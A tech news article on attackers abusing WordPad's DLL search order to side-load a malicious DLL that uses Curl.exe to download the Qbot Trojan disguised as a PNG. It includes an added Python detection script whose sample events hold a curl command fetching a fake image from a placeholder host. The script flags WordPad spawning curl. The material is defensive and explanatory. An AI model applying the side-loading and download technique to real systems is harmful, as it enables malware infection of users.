If you’re still using WordPad, quit now – it’s being used to spread the virus
May 31, 2023
As 24 Channel reported, experts from the Cryptolaemus community mentioned the vulnerability. This development raises concerns about the security of Windows 10 users and the potential for similar attacks against other software.
New attack mechanic
The vulnerability lies in WordPad’s DLL file search mechanism, which is necessary for the program to work properly. When WordPad starts, it automatically searches for DLL files starting from the folder containing its executable. However, this process does not check the integrity or legitimacy of DLL files, which allows attackers to inject malicious code.
This type of attack, known as DLL side-loading or DLL hijacking, has been used in the past. A similar vulnerability was previously discovered in Windows Calculator that allowed cybercriminals to execute malicious code. The hackers took advantage of the way WordPad searches for DLL files to continue their malicious activity.
When WordPad starts and loads the malicious DLL file, the DLL calls the Curl.exe executable in the System32 folder. This executable is used to download a file disguised as a PNG image, which is actually an old version of the Qbot Trojan.
One worrying aspect of this attack is that it uses the resources of the legitimate WordPad program, making it difficult for anti-virus programs to detect the threat. This increases the likelihood that an attack will go undetected by unsuspecting users. In addition, the attack depends on the presence of the Curl.exe utility, which is not included in standard Windows installations prior to version 10.
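Both behaviours described above leave traces in process-creation logs: WordPad running from a folder other than its usual install locations, and WordPad launching Curl.exe. The Python below is an added example, not code from the original article; the event field names, the sample events and the list of trusted WordPad folders are assumptions.

```python
import ntpath

# Assumed WordPad binary names and default Windows folders (lower-cased).
WORDPAD_NAMES = {"wordpad.exe", "write.exe"}
TRUSTED_DIRS = {
    r"c:\program files\windows nt\accessories",
    r"c:\program files (x86)\windows nt\accessories",
    r"c:\windows\system32",
    r"c:\windows",
}

# Constructed process-creation events; the field names are hypothetical.
EXPLORER = r"C:\Windows\explorer.exe"
COPIED = r"C:\Users\demo\Downloads\invoice\wordpad.exe"
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent_image": EXPLORER, "command_line": "wordpad.exe",
     "image": r"C:\Program Files\Windows NT\Accessories\wordpad.exe"},
    {"host": "ws-02", "parent_image": EXPLORER, "command_line": "wordpad.exe",
     "image": COPIED},
    {"host": "ws-02", "parent_image": COPIED,
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe -o out.png https://example.invalid/image.png"},
    {"host": "ws-03", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": "curl.exe https://example.invalid/health"},
]

def _split(path):
    """Return (directory, file name) of a Windows path, lower-cased."""
    return ntpath.split(path.lower())

def triage(events):
    """Flag WordPad started outside trusted folders and curl.exe children of WordPad."""
    findings = []
    for ev in events:
        img_dir, img_name = _split(ev["image"])
        _, parent_name = _split(ev["parent_image"])
        # A WordPad binary outside its install folders resolves DLLs from that folder first.
        if img_name in WORDPAD_NAMES and img_dir not in TRUSTED_DIRS:
            findings.append((ev["host"], "wordpad-outside-trusted-dir", ev["image"]))
        # A text editor has no routine reason to start a download utility.
        if parent_name in WORDPAD_NAMES and img_name == "curl.exe":
            findings.append((ev["host"], "wordpad-spawned-curl", ev["command_line"]))
    return findings

if __name__ == "__main__":
    for host, rule, detail in triage(SAMPLE_EVENTS):
        print(host, rule, detail)
```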
How do you protect yourself from an attack?
Users are strongly advised to regularly update their antivirus software and operating systems to guard against such vulnerabilities. Microsoft has been notified of this issue and is expected to release a security patch to address the WordPad vulnerability as soon as possible. Meanwhile, users should exercise caution when opening files or documents from untrusted sources, especially those received via email.
I’m Sandra Torres, a passionate journalist and content creator. My specialty lies in covering the latest gadgets, trends and tech news for Div Bracket. With over 5 years of experience as a professional writer, I have built up an impressive portfolio of published works that showcase my expertise in this field.